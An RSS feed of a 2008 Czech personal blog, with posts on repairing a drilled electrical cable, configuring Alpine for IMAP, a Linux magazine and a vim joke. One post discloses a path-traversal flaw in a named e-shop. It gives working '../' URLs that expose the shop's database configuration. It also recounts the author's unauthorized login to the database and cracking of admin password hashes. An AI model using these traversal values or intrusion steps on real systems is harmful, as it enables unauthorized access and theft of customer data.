<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>Hodžův blog</title>
	<atom:link href="http://hodza.net/feed/" rel="self" type="application/rss+xml" />
	<link>http://hodza.net</link>
	<description>I přestože jsem paranoidní neznamená, že mě nedostanou...</description>
	<pubDate>Fri, 26 Sep 2008 13:31:39 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6.2</generator>
	<language>en</language>
			<item>
		<title>Jak na převrtaný elektrický kabel</title>
		<link>http://hodza.net/2008/09/26/jak-na-prevrtany-elektricky-kabel/</link>
		<comments>http://hodza.net/2008/09/26/jak-na-prevrtany-elektricky-kabel/#comments</comments>
		<pubDate>Fri, 26 Sep 2008 13:26:32 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Hardware]]></category>

		<category><![CDATA[Kabeláž]]></category>

		<category><![CDATA[Ostatní]]></category>

		<category><![CDATA[Ze života]]></category>

		<guid isPermaLink="false">http://hodza.net/?p=194</guid>
		<description><![CDATA[I mistr tesař se někdy utne říká jedno staročeské přísloví. A protože neštěstí nechodí po horách ale po lidech, tak mě se to povedlo (během krátké chvíle) hned dvakrát. Důvodem, proč se tak stalo, byla snaha zavést doma jistý řád v organizaci klíčů.
Neustále se povalující klíče od auta, motorky či bytu mě občasně doháněli k [...]]]></description>
			<content:encoded><![CDATA[<p>I mistr tesař se někdy utne říká jedno staročeské přísloví. A protože neštěstí nechodí po horách ale po lidech, tak mě se to povedlo (během krátké chvíle) hned dvakrát. Důvodem, proč se tak stalo, byla snaha zavést doma jistý řád v organizaci klíčů.</p>
<p><span id="more-194"></span>Neustále se povalující klíče od auta, motorky či bytu mě občasně doháněli k šílenství. V inkriminovaný den jsem se tedy rozhodl navštívit hypermarket Globus, kde jsem zakoupil 2 kusy univerzálních držáků. V místě mého bydliště jsem na pokyn výrobce začal vrtačkou do zdi vytvářet díry o předem danné rozteči a průměru. K mé velké smůle jsem však již při hloubení druhé díry ve zdi přeťal kabel elektrického vedení. Nenechal jsem se ovlivnit hlasitým výbojem, sršením jističů ani nadávkami z kuchyně, že dnes bude zase studená večeře a pokračoval ve vrtání třetí díry. Tím pádem se mi během několika málo vteřin podařilo vybavit nejenom všechny jističe v mé bytové jednotce, ale i ten na chodbě. Bylo mi jasné, že nyní již budu muset neodkladně provést opravu.</p>
<p><strong>Co budeme potřebovat?</strong></p>
<p>Abychom neustále nependlovali mezi rozmláceným bytem, baumaxem, globusem, obi a hornbachem, je vhodné si dopředu nejprve ujasnit, které nářadí a pomůcky budeme potřebovat. Vše je patrné na následující fotce:</p>
<div id="attachment_195" class="wp-caption aligncenter" style="width: 160px"><a href="http://hodza.net/wp-content/uploads/2008/09/dscn5288.jpg"><img class="size-thumbnail wp-image-195" title="Potřebné nářadí" src="http://hodza.net/wp-content/uploads/2008/09/dscn5288-150x150.jpg" alt="Potřebné nářadí" width="150" height="150" /></a><p class="wp-caption-text">Potřebné nářadí</p></div>
<p>Nejdůležitějším vybavením pro obnažení zdiva je středně velký majzlík a kladívko. Pokud jste stejně jako já svině líné, pak si kupte místo toho pořádné bourací kladivo. Můj 7 kilový brouček se jménem Ferm Power Hammer dokáže díky úderu o síle 7J vybourat v panelu díru pro dveře během pár chvil. Důležité je ale předem upozornit místní seismologickou stanici, že budete pracovat. V opačném připadě by se jim mohli zbláznit přístroje. Po odkrájení přebytečného zdiva využijete především štípačky, kterými odstraníte původní &#8220;překouslé&#8221; vedení. Ostrý nůž následně hravě odstraní přebytečnou bužírku z vodičů a pro jejich spojení použijete speciální elektrikářské dutinky s izolací a lepidlem. Montáž dutinek bohužel vyžaduje speciální kleště a horkovzdušnou pistoli. Na né příliš dobře zatěsněná místa je vhodné použít vulkanizační pásku. Ve finále nezapomeňte koupit pytlík sádry a špachtli.</p>
<p><strong>3-2-1 Opravujem</strong></p>
<p>Před zahájením bouracích prací je vhodné vypnout všechny jističe, zkontrolovat tloušťku zdiva (jinak je možné, že se dostanete až k sousedovi do koupelny) a rozkrelit postup prací.</p>
<div id="attachment_196" class="wp-caption aligncenter" style="width: 160px"><a href="http://hodza.net/wp-content/uploads/2008/09/dscn5268.jpg"><img class="size-thumbnail wp-image-196" title="Lokalizace problému" src="http://hodza.net/wp-content/uploads/2008/09/dscn5268-150x150.jpg" alt="Lokalizace problému" width="150" height="150" /></a><p class="wp-caption-text">Lokalizace problému</p></div>
<p>Zdivo vybouráme 5 centimetrů vlevo i vpravo podél celého kabelu. Od místa přerušení pak minimálně 10cm směrem nahoru i dolů (já jsem kabel zároveň převrtal na dvou místech, takže jsem byl nucen vysekat větší kus). V okamžiku kdy je kabel volný, přestřihneme ho štípacími kleštěmi a odstraníme vadné (převrtané části).</p>
<div id="attachment_197" class="wp-caption aligncenter" style="width: 160px"><a href="http://hodza.net/wp-content/uploads/2008/09/dscn5272.jpg"><img class="size-thumbnail wp-image-197" title="Přeštípnutí kabelu" src="http://hodza.net/wp-content/uploads/2008/09/dscn5272-150x150.jpg" alt="Přeštípnutí kabelu" width="150" height="150" /></a><p class="wp-caption-text">Přeštípnutí kabelu</p></div>
<div id="attachment_198" class="wp-caption aligncenter" style="width: 160px"><a href="http://hodza.net/wp-content/uploads/2008/09/dscn5274.jpg"><img class="size-thumbnail wp-image-198" title="Odstranění přebytečného kabelu" src="http://hodza.net/wp-content/uploads/2008/09/dscn5274-150x150.jpg" alt="Odstranění přebytečného kabelu" width="150" height="150" /></a><p class="wp-caption-text">Odstranění přebytečného kabelu</p></div>
<p>Zbylý kabel je potřeba cca 4mm od konce odizolovat.</p>
<div id="attachment_203" class="wp-caption aligncenter" style="width: 160px"><a href="http://hodza.net/wp-content/uploads/2008/09/dscn5277.jpg"><img class="size-thumbnail wp-image-203" title="Odizolovaný kabel" src="http://hodza.net/wp-content/uploads/2008/09/dscn5277-150x150.jpg" alt="Odizolovaný kabel" width="150" height="150" /></a><p class="wp-caption-text">Odizolovaný kabel</p></div>
<p>Mezi konce kabelů vložíme spojovací dutinku. Ta po stisku speciálních kleští vytvoří pevné a nerozebíratelné spojení. Po zalisování stačí dutinku zahřát horkovzdušnou pistolí. Tím dojde k rozpuštění lepidla a smrštění vnější izolace. Spojení je pak 100%.</p>
<div id="attachment_206" class="wp-caption aligncenter" style="width: 160px"><a href="http://hodza.net/wp-content/uploads/2008/09/dscn5281.jpg"><img class="size-thumbnail wp-image-206" title="Spojovací dutinka" src="http://hodza.net/wp-content/uploads/2008/09/dscn5281-150x150.jpg" alt="Spojovací dutinka" width="150" height="150" /></a><p class="wp-caption-text">Spojovací dutinka</p></div>
<p>V mé výbavě jsem bohužel nenašel lisovací kleště se správným průměrem na dutinku. Na místo nich jsem použil klešte pro lisování konektorů BNC. Ty ovšem mají ostrá hrany a tak poruší vnější izolaci dutinky. Tento problém jsem vyřešil tak, že přes každou dutinku jsem přetáhl ještě jednu speciální smršťovací bužírku s velmi vysokou elektrickou pevností.</p>
<div id="attachment_209" class="wp-caption aligncenter" style="width: 160px"><a href="http://hodza.net/wp-content/uploads/2008/09/dscn5282.jpg"><img class="size-thumbnail wp-image-209" title="Zesílená izolace - před smrštěním" src="http://hodza.net/wp-content/uploads/2008/09/dscn5282-150x150.jpg" alt="Zesílená izolace - před smrštěním" width="150" height="150" /></a><p class="wp-caption-text">Zesílená izolace - před smrštěním</p></div>
<div id="attachment_210" class="wp-caption aligncenter" style="width: 160px"><a href="http://hodza.net/wp-content/uploads/2008/09/dscn5283.jpg"><img class="size-thumbnail wp-image-210" title="Zesílená izolace - po smrštění" src="http://hodza.net/wp-content/uploads/2008/09/dscn5283-150x150.jpg" alt="Zesílená izolace - po smrštění" width="150" height="150" /></a><p class="wp-caption-text">Zesílená izolace - po smrštění</p></div>
<p>Celou instalaci je více než vhodné ve finále opět zaizolovat. Já jsem použil smrtovací bužírky v kratší (horní) části spoje a vulkanizační pásky v delší (dolní) části spoje.</p>
<div id="attachment_213" class="wp-caption aligncenter" style="width: 160px"><a href="http://hodza.net/wp-content/uploads/2008/09/dscn5284.jpg"><img class="size-thumbnail wp-image-213" title="Finální izolace" src="http://hodza.net/wp-content/uploads/2008/09/dscn5284-150x150.jpg" alt="Finální izolace" width="150" height="150" /></a><p class="wp-caption-text">Finální izolace</p></div>
<p>Výsledek našeho půlhodinového snažení zasádrujeme (uděláme omítku).</p>
<div id="attachment_214" class="wp-caption aligncenter" style="width: 160px"><a href="http://hodza.net/wp-content/uploads/2008/09/dscn5285.jpg"><img class="size-thumbnail wp-image-214" title="Příprava sádry" src="http://hodza.net/wp-content/uploads/2008/09/dscn5285-150x150.jpg" alt="Příprava sádry" width="150" height="150" /></a><p class="wp-caption-text">Příprava sádry</p></div>
<div id="attachment_215" class="wp-caption aligncenter" style="width: 160px"><a href="http://hodza.net/wp-content/uploads/2008/09/dscn5286.jpg"><img class="size-thumbnail wp-image-215" title="Před omítnutím" src="http://hodza.net/wp-content/uploads/2008/09/dscn5286-150x150.jpg" alt="Před omítnutím" width="150" height="150" /></a><p class="wp-caption-text">Před omítnutím</p></div>
<p><strong>Závěr</strong></p>
<p>Celý úkon trval sotva hodinku a IMHO vypadá mnohem lépe než dvě spojovací krabice (jak mi radili někteří Inženýři&#8230;.). Pro zvědavce uvádím, že dutinky stojí 9Kč/Kus, sádra 12 Korun, takže i finančně se to dá zvládnout.</p>
<p><strong>Na co si dát příště bacha</strong></p>
<p>Na kočky&#8230; Při chvíli přemýšlení jsem zpozoroval divný zvuk, který vycházel z útrob kufru od bouracího kladiva. Po jeho otevření mi vše bylo jasné.</p>
<div id="attachment_219" class="wp-caption aligncenter" style="width: 160px"><a href="http://hodza.net/wp-content/uploads/2008/09/dscn5279.jpg"><img class="size-thumbnail wp-image-219" title="Bambína zase chrní" src="http://hodza.net/wp-content/uploads/2008/09/dscn5279-150x150.jpg" alt="Bambína zase chrní" width="150" height="150" /></a><p class="wp-caption-text">Bambína zase chrní</p></div>
]]></content:encoded>
			<wfw:commentRss>http://hodza.net/2008/09/26/jak-na-prevrtany-elektricky-kabel/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Alpine a IMAP</title>
		<link>http://hodza.net/2008/08/04/alpine-a-imap/</link>
		<comments>http://hodza.net/2008/08/04/alpine-a-imap/#comments</comments>
		<pubDate>Mon, 04 Aug 2008 09:02:34 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Linux]]></category>

		<category><![CDATA[Služby]]></category>

		<category><![CDATA[Smtp]]></category>

		<guid isPermaLink="false">http://hodza.net/?p=141</guid>
		<description><![CDATA[Již dlouhou dobu si pohrávám s myšlenkou, že se od Mozilly Thunderbird vrátím zpět k emailovému klientovi (al)pine. Důvodem je především rychlost. Ta mi u Thunderbirdu subjektivně přijde stále horší a to i přes fakt, že k práci používám zásadně protokol IMAP. Po koupi nového subnotebooku MSI WIND mě navíc začala štvát &#8220;roztahanost&#8221; celého GUI. [...]]]></description>
			<content:encoded><![CDATA[<p>Již dlouhou dobu si pohrávám s myšlenkou, že se od <a title="Mozilla Thunderbird" href="http://www.czilla.cz/produkty/thunderbird/">Mozilly Thunderbird</a> vrátím zpět k emailovému klientovi (<a title="Alpine" href="http://www.washington.edu/alpine/">al</a>)<a title="Pine" href="http://www.washington.edu/pine/">pine</a>. Důvodem je především rychlost. Ta mi u Thunderbirdu subjektivně přijde stále horší a to i přes fakt, že k práci používám zásadně protokol IMAP. Po koupi nového subnotebooku MSI WIND mě navíc začala štvát &#8220;roztahanost&#8221; celého GUI. Při použití i těch nejmenších písmen a ikon bez popisku si mohu přečíst sotva prvních pár řádků z celého emailu (a to jsem navíc ošizen o podstatnou část hlaviček). Kapitolou sama pro sebe je náročnost na paměť a výkon procesoru.</p>
<p><span id="more-141"></span></p>
<p>Pine jsem používal před několika lety společně s <a title="Fetchmail" href="http://fetchmail.berlios.de/">fetchmailem</a>. To už by byl dnes problém, neboť potřebuji mít k poště mobilní přístup odkudkoliv (můj mail box čítá více jak 10 000 emailů) a tak jsem začal pátrat, zda-li existuje možnost používat nativně <a title="IMAP" href="http://cs.wikipedia.org/wiki/Internet_Message_Access_Protocol">IMAP</a>. Naštěstí existuje!</p>
<p>První co bylo potřeba udělat je vyměnit starý a dnes již nevyvíjený <a title="Pine" href="http://www.washington.edu/pine/">Pine</a> za <a title="Alpine" href="http://www.washington.edu/alpine/">Alpine</a>. Jako betatester mi posloužil<a title="Blog Ivana Bíbra" href="http://www.bibri.net/"> Ivan Bíbr</a> - <a title="urpme pine" href="http://www.bibri.net/2008/06/29/urpme-pine/">více na jeho blogu</a>. Ovládání i konfigurační soubory jsou naštěstí stejné, takže mi nečinilo problém Alpine naohýbat k obrazu svému. Dále jsem pokračoval úpravou konfiguračního souboru .pinerc v domovském adresáři.</p>
<p><code>$ vi ~/.pinerc</code></p>
<p>V souboru .pinerc jsem upravil konfigurační volby &#8220;<strong>smtp-server</strong>&#8220;, &#8220;<strong>inbox-path</strong>&#8221; a &#8220;<strong>feature-list</strong>&#8221; na následující:</p>
<p><em>Pozn.: Jednotlivé volby je samozřejmě možné &#8220;naklikat&#8221; přes menu Alpine, ale takhle mi to přijde jednodušší.</em></p>
<p><code>smtp-server=smtp.example.com<br />
inbox-path={mail.example.com/user=test@test.com/ssl/novalidate-cert}INBOX<br />
feature-list=enable-incoming-folders</code></p>
<p>Ve výše uvedeném příkladu jsem předpokládal, že:<br />
SMTP server je: smtp.example.com<br />
IMAP server je: mail.example.com<br />
Přihlašovací jméno je: test@test.com<br />
K serveru se připojujeme pomocí SSL via self-signed certifikát</p>
<p>Protože Alpine defaultně pracuje s lokálně uloženými složkami, bylo potřeba ho ještě naučit pracovat přímo s IMAPem. postup je velice jednoduchý:</p>
<p><code>$ alpine<br />
Zmáčkneme S (Setup)<br />
Zmáčkneme L (collectionLists)<br />
Zmáčkneme A (Add Client)</code></p>
<p>Vyplníme:<br />
<code>Nickname : IMAP složky<br />
Server : mail.example.com/user=test@test.com/ssl/novalidate-cert<br />
Path : INBOX.<br />
View :</code></p>
<p>Nakonec zmáčkneme klávesu CTRl+x pro uložení změn</p>
<p>Tak a je hotovo - můžu používat IMAP!</p>
]]></content:encoded>
			<wfw:commentRss>http://hodza.net/2008/08/04/alpine-a-imap/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Linuxový časopis stále existuje - je to LinuxEXPRES</title>
		<link>http://hodza.net/2008/04/04/linuxovy-casopis-stale-existuje-je-to-linuxexpres/</link>
		<comments>http://hodza.net/2008/04/04/linuxovy-casopis-stale-existuje-je-to-linuxexpres/#comments</comments>
		<pubDate>Fri, 04 Apr 2008 06:16:40 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Linux]]></category>

		<category><![CDATA[LinuxExpres]]></category>

		<category><![CDATA[časopis]]></category>

		<category><![CDATA[články]]></category>

		<category><![CDATA[Jirka Vrba]]></category>

		<category><![CDATA[linuxovy casopis]]></category>

		<category><![CDATA[portál]]></category>

		<category><![CDATA[vlastimil ott]]></category>

		<guid isPermaLink="false">http://hodza.net/?p=119</guid>
		<description><![CDATA[V srpnu 2007 jsme oznámili, že končíme s vydáváním papírové verze časopisu. Nepřestali jsme se ovšem věnovat webu a dnes lze s úspěchem říct, že portál LinuxEXPRES.cz je velmi úspěšný.
Ještě máme v záloze nějaké starší články, které jsou nadčasové (kancelář apod.), ale už od listopadu intenzivně vydáváme články nové, což se pozitivně promítlo na návštěvnosti. [...]]]></description>
			<content:encoded><![CDATA[<p>V srpnu 2007 jsme <a href="http://www.linuxexpres.cz/aktuality/casopis-linuxexpres-konci">oznámili</a>, že končíme s vydáváním papírové verze časopisu. Nepřestali jsme se ovšem věnovat webu a dnes lze s úspěchem říct, že portál <a href="http://www.linuxexpres.cz/">LinuxEXPRES.cz</a> je velmi úspěšný.</p>
<p>Ještě máme v záloze nějaké starší články, které jsou nadčasové (kancelář apod.), ale už od listopadu intenzivně vydáváme články nové, což se pozitivně promítlo na návštěvnosti. Minimálně od září “jdeme nahoru” - navštěvuje nás stále víc lidí a vracejí se k nám.</p>
<p><a href="http://hodza.net/wp-content/uploads/2008/04/le2007.png"><img class="alignnone size-medium wp-image-120" title="Statistiky návštěvnosti Linux Expres 2007" src="http://hodza.net/wp-content/uploads/2008/04/le2007.png" alt="Statistiky návštěvnosti Linux Expres 2007" width="273" height="201" /></a></p>
<p><span id="more-119"></span></p>
<p>Jirka Vrba vydává pravidelné <a href="http://www.linuxexpres.cz/blog/souhrn">měsíční reporty</a>, kde se lze dočíst, co čtenáře zajímá. Je to pro nás vodítko, řídíme se jím při přípravě nových článků.</p>
<p>Bohužel se mi stává, že se mi ozvou lidi se slovy “škoda, že jste skončili a na webu vycházejí jen staré články”. Nevím, jestli se mám smát, nebo nesmát. Půl roku intenzivní práce a někdo si ani nedá práci, aby nacvakal adresu <a title="Linux expres - opravdový Linuxový časopis" href="http://www.linuxexpres.cz">www.<span class="internal_tag">linuxexpres</span>.cz</a>. Ale zřejmě to je to naše (moje) chyba, není o nás prostě slyšet. Takže to chci změnit.</p>
<h1>LinuxEXPRES žije!</h1>
<p>A žije bohatým životem. Vydáváme <a href="http://www.zive.cz/Software/sc-92/default.aspx">články pro server Živě</a>, čímž se snažíme dostat <a class="internal_tag" title="Posts tagged with Linux" rel="tag" href="http://www.e-ott.info/tag/linux/">Linux</a> k lidem, kteří sledují obecný trend v IT a o Linuxu by si rádi něco přečetli. Některé diskuze jsou “živěé”, ale asi je to dobře.</p>
<p><a href="http://www.linuxexpres.cz/">Portál LinuxEXPRES.cz</a> prošel oživovací kúrou - vylepšili jsme design, vymysleli jsme nové rubriky, přinášíme nové články:</p>
<ul>
<li><a href="http://www.linuxexpres.cz/dva-tydny-s-linuxem">Dva týdny s Linuxem</a> je pravidelný “novinkový” seriál Jirky Eischmanna, právě tenhle vychází na zmiňovaném Živě.cz.</li>
<li><a href="http://www.linuxexpres.cz/modules/profile/userinfo.php?uid=1922">Jirka Němec</a> ze serveru <a href="http://linuxgames.cz/">LinuxGames.cz</a> pro nás připravuje pravidelný <a href="http://www.linuxexpres.cz/tag/linuxgames">měsíční přehled</a> o novinkách v linuxových hrách a hříčkách. Jirka se v oboru vyzná, ostatně proto jsme ho oslovili.</li>
<li>“Příběhy ze života” <a href="http://www.linuxexpres.cz/proc-pouziva-linux">Proč používá Linux</a> zachycují příběhy uživatelů Linuxu. Jak se k němu dostali, proč si jej vybrali, k čemu a jak jej používají. Právě tady potřebujeme pomoc vás všech. Napište krátký text, kde ukážete, že <a class="internal_tag" title="Posts tagged with Linux" rel="tag" href="http://www.e-ott.info/tag/linux/">Linux</a> je zcela běžný moderní systém, který vám vyhovuje - byť má chyby. Příklady táhnou a mohou mít mnohem větší význam, než si můžete myslet.</li>
<li>Další naší snahou je stát se službou pro lokální sdružení a seskupení, která konají různé akce. Jsme samozřejmě mediálním partnerem např. konference <a href="http://www.linuxexpo.cz/">Linuxexpo</a> (kam se letos chystám, abych udělal pár rozhovorů, máte se nač těšit, milí čtenáři LE ;-)), ale zajímají nás také “malé” věci. Proto jsme vytvořili interaktivní mapu (na titulce) a také <a href="http://www.linuxexpres.cz/komunita">stránky měst</a>, “kde se něco děje”. Bohužel ne všechna uvedená města mají svůj obsah, a ne všechna města, kde se něco děje, jsou v mapě. Napište, prosím.Pokud pořádáte linuxovou akci, rádi vám vydáme tiskovku, sborník nebo reportáž. Nás to nic nestojí a vám to třeba pomůže. Také máme kalendář, kam můžete data akcí <a href="http://www.linuxexpres.cz/modules/calendar/index.php?action=cal_form">zadávat</a> - zcela zdarma a bez nějakého omezení. Chceme podporovat i drobné akce, protože si myslíme, že mají smysl.</li>
</ul>
<p>Nápadů máme stále hodně, v přípravě je mnoho článků, samozřejmě je nebudu prozrazovat, ale věřím, že budou zajímavé  a čtivé.</p>
<p>Hodně čtenářů se v anketě vyjádřilo, že by poslali příspěvek na provoz portálu. Buď formou SMS, nebo přímo na účet. Rozjeli jsme to a tahle <a href="http://www.linuxexpres.cz/o-webu/sms-za-clanky">možnost je tedy k dispozici</a> (<a href="http://www.linuxexpres.cz/blog/sms-za-clanky">diskuze v blogu</a>). Příspěvky poslouží k bonusovému ohodnocení autorů a vytváření nového obsahu. Ony “se” ty nápady samy neudělají, bohužel.</p>
<p>Jak bych to shrnul? Těší nás statistický zájem, ale brzdí nás, že se lidi nevyjádří: nediskutují, nenadávají, nechválí, nepíšou do redakce, že chtějí ten a ten článek, moc neposílají esemesky. Co je blbě?</p>
<p>V.O. v.r.</p>
]]></content:encoded>
			<wfw:commentRss>http://hodza.net/2008/04/04/linuxovy-casopis-stale-existuje-je-to-linuxexpres/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Pomocník pro vi(m)</title>
		<link>http://hodza.net/2008/03/21/pomocnik-pro-vim/</link>
		<comments>http://hodza.net/2008/03/21/pomocnik-pro-vim/#comments</comments>
		<pubDate>Fri, 21 Mar 2008 10:12:12 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Linux]]></category>

		<category><![CDATA[Ostatní]]></category>

		<category><![CDATA[Sranda]]></category>

		<category><![CDATA[Ze života]]></category>

		<guid isPermaLink="false">http://hodza.net/2008/03/21/pomocnik-pro-vim/</guid>
		<description><![CDATA[Obrázkové emaily od mých kamarádů jsou obvykle SPAM, ale občas se mezi nimi najde i vtipný kousek.
Dnes jsem jeden takový dostal a tak se s vámi o něj rád podělím&#8230;
P.S. Otvírejte v prohlížeči, který umí animované gify&#8230;

]]></description>
			<content:encoded><![CDATA[<p>Obrázkové emaily od mých kamarádů jsou obvykle SPAM, ale občas se mezi nimi najde i vtipný kousek.<br />
Dnes jsem jeden takový dostal a tak se s vámi o něj rád podělím&#8230;</p>
<p><em>P.S. Otvírejte v prohlížeči, který umí animované gify&#8230;</em></p>
<p><a href="http://hodza.net/wp-content/uploads/2008/03/vim_paperclip.gif" title="Nejlepší editor"><img src="http://hodza.net/wp-content/uploads/2008/03/vim_paperclip.thumbnail.gif" alt="Nejlepší editor" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://hodza.net/2008/03/21/pomocnik-pro-vim/feed/</wfw:commentRss>
		</item>
		<item>
		<title>České eshopy &#8220;rozdávají&#8221; Vaše data</title>
		<link>http://hodza.net/2008/03/17/ceske-eshopy-rozdavaji-vase-data/</link>
		<comments>http://hodza.net/2008/03/17/ceske-eshopy-rozdavaji-vase-data/#comments</comments>
		<pubDate>Mon, 17 Mar 2008 11:17:03 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Bezpečnost]]></category>

		<category><![CDATA[Hack/Crack]]></category>

		<guid isPermaLink="false">http://hodza.net/2008/03/17/ceske-eshopy-rozdavaji-vase-data/</guid>
		<description><![CDATA[Nakupování v eshopech se u nás stalo celkem běžnou záležitostí. Není se také čemu divit - ceny bývají oproti kamenným obchodům většinou nesrovnatelné (nesrovnatelně nízké). Zboží si můžeme interaktivně prohlédnout v teple domova, zaplatit převodem přes internet, nechat doručit dobírkou a když se nám nelíbí tak ho zase vrátit. Možná to zní jako pohádka, ale [...]]]></description>
			<content:encoded><![CDATA[<p>Nakupování v eshopech se u nás stalo celkem běžnou záležitostí. Není se také čemu divit - ceny bývají oproti kamenným obchodům většinou nesrovnatelné (nesrovnatelně nízké). Zboží si můžeme interaktivně prohlédnout v teple domova, zaplatit převodem přes internet, nechat doručit dobírkou a když se nám nelíbí tak ho zase vrátit. Možná to zní jako pohádka, ale to neznamená, že náš příběh bude mít dobrý konec&#8230;<br />
<span id="more-116"></span><br />
Málo kdo si totiž uvědomuje, že se současným vyplněním objednávky v eshopu zanechává svůj &#8220;otisk&#8221;. Eshopy obvykle shromažďují data nezbytně nutná (jako je jméno, adresa či telefon). Nebývá ale vy jímkou, když si uloží také údaje mnohem citlivější - jako jsou například informace o vaší platební kartě.</p>
<p>V tom lepším případě, by při nabourání obchodu &#8220;hackerem&#8221;, mohlo vyjít najevo, že si každý měsíc po výplatě objednáváte nějakou sprosťárničku v sexshopu. V horším případě útočník zjistí i heslo a bude si tak moct číst vaši soukromou poštu s přítelkyní/milenkou/manželkou neboť do emailu zadáváte stejné heslo jako do eshopu. Pokud chcete slyšet hororové scénáře, pak věřte, že není problém využít uložených informací o vaší kartě a objednat si tak jakékoliv zboží, které ve výsledku ovšem nezaplatí útočník, ale vy z vaší karty.</p>
<p>Stále si myslíte, že se vám to nemůže stát neboť nakupujete pouze v renomovaných a velkých eshopech? Chyba!</p>
<p>Před před více jak týdnem jsem zcela náhodou objevil na stránkách jednoho z největších českých prodejců outdoorového vybavení - firmy Rock point zcela zásadní (a naprosto školáckou) bezpečnostní chybu. Ihned jsem prodejce emailově kontaktoval a problém mu nastínil. Bohužel do dnešního dne jsem neobdržel odpověď a chyba je stále neopravená.</p>
<p>O co jde?</p>
<p>Při hledání dokumentace k jednomu z výrobků jsem narazil na následující odkaz:</p>
<p><a href="http://www.rockpoint.cz/download.php?soubor=soubory/seznam_odberatelu_NET.xls" title="http://www.rockpoint.cz/download.php?soubor=soubory/seznam_odberatelu_NET.xls">http://www.rockpoint.cz/download.php?soubor=soubory/seznam_odberatelu_NET.xls</a></p>
<p>Nebývá zrovna zvykem, že by prodejce uveřejňoval seznam svých odběratelů. To ve mě vyvolalo pocit, že tato stránka měla být před zraky zákazníků ukryta. Začal jsem přemýšlet, co by se stalo, kdybych zadal jako parametr jiný soubor než je seznam_odberatelu_NET.xls. Po chvíli jsem tedy do adresního řádku zadal následující adresu:</p>
<p><a href="http://www.rockpoint.cz/download.php?soubor=soubory/../index.php" title="http://www.rockpoint.cz/download.php?soubor=soubory/../index.php">http://www.rockpoint.cz/download.php?soubor=soubory/../index.php</a></p>
<p>Při čemž &#8220;index.php&#8221; bývá &#8220;startovací stránkou&#8221; webu a řetězec &#8220;../&#8221; značí, že se jedná o nadřazený adresář.<br />
To co se stalo mi téměř vyrazilo dech. Zobrazila se mi totiž opravdu zdrojová stránka souboru index.php. Opravdu bych nečekal, že u tak velkého prodejce narazím na tak kritickou chybu.</p>
<p>Ze zvědavosti jsem stejným způsobem procházel všechny ostatní soubory na serveru, až jsem došel k následujícímu:</p>
<p><a href="http://www.rockpoint.cz/download.php?soubor=inc/conf_databaze.php" title="http://www.rockpoint.cz/download.php?soubor=inc/conf_databaze.php">http://www.rockpoint.cz/download.php?soubor=inc/conf_databaze.php</a></p>
<p>Tento soubor (jak je již patrné z názvu) obsahuje data potřebná pro připojení k My SQL databázi.<br />
Tím ovšem má zvědavost neskončila. Rozhodl jsem se výsledek ověřit.</p>
<p>V konfiguračním souboru je uveden jako My SQL host &#8220;uvdb4.globe.cz&#8221;. Vzdálený přístup k této databázi sice není povolen, ale to mě nemohlo odradit. Po chvíli hledání jsem zjistil, že se jedná o server, který je provozován v rámci hostingu Active 24. Na stejnojmenných stránkách jsem pak v sekci podpora našel odkaz k PHPMyAdminovi, který umožňuje spravovat My SQL databáze pomocí web prohlížeče. Kliknul jsem na link a zadal přihlašovací údaje. Nemohlo následovat nic jiného, než úspěšné přihlášení. Přede mnou byl kompletní seznam všech výrobků, uživatelů, objednávek a seznamů prodejen. V podstatě bych v této chvíli mohl eshop plně ovládnout, ale mě zajímala poslední neprozkoumaná věc - administrativní sekce obchodu.</p>
<p>Administrační sekci nebylo zase tak těžké najít. Kupodivu se nacházela na url:</p>
<p><a href="http://www.rockpoint.cz/admin/" title="http://www.rockpoint.cz/admin/">http://www.rockpoint.cz/admin/</a></p>
<p>Nahlédl jsem zpět do tabulky administrátorů, abych zjistil přihlašovací jméno a heslo. Zde byla alespoň nějaká snaha o zabezpečení - heslo bylo zakódováno pomocí algoritmu MD5. Bohužel tento algoritmus je už dnes &#8220;překonaný&#8221;. Heslo prvního administrátora jsem tak &#8220;rozlouskl&#8221; díky jeho jednoduchosti přes jednu z online HASH databází. Heslo druhého administrátora bylo sice složitější, ovšem pod útokem rainbow tabulek bylo  později prolomeno také. Oba účty jsem ještě otestoval - byly funkční. Tím má &#8220;práce&#8221; skončila.</p>
<p>Výše uvedený text nenabádá k zneužití popsané chyby. Text byl sepsán z důvodu laxního přístupu administrátorů danných stránek.</p>
]]></content:encoded>
			<wfw:commentRss>http://hodza.net/2008/03/17/ceske-eshopy-rozdavaji-vase-data/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Chráněno: Hacked gallery - 11.3.2008</title>
		<link>http://hodza.net/2008/03/11/hacked-gallery-1132008/</link>
		<comments>http://hodza.net/2008/03/11/hacked-gallery-1132008/#comments</comments>
		<pubDate>Tue, 11 Mar 2008 10:46:01 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Bezpečnost]]></category>

		<category><![CDATA[Hack/Crack]]></category>

		<guid isPermaLink="false">http://hodza.net/2008/03/11/hacked-gallery-1132008/</guid>
		<description><![CDATA[Stručný obsah příspěvku zde není uveden, protože tento příspěvek je chráněný heslem.]]></description>
			<content:encoded><![CDATA[<form action="http://hodza.net/wp-pass.php" method="post">
<p>Tento příspěvek je chráněný heslem. Pokud jej chcete zobrazit, zadejte své heslo:</p>
<p><label for="pwbox-106">Heslo:<br />
<input name="post_password" id="pwbox-106" type="password" size="20" /></label><br />
<input type="submit" name="Submit" value="Uložit" /></p></form>
]]></content:encoded>
			<wfw:commentRss>http://hodza.net/2008/03/11/hacked-gallery-1132008/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Chráněno: Hacked gallery - 7.3.2008</title>
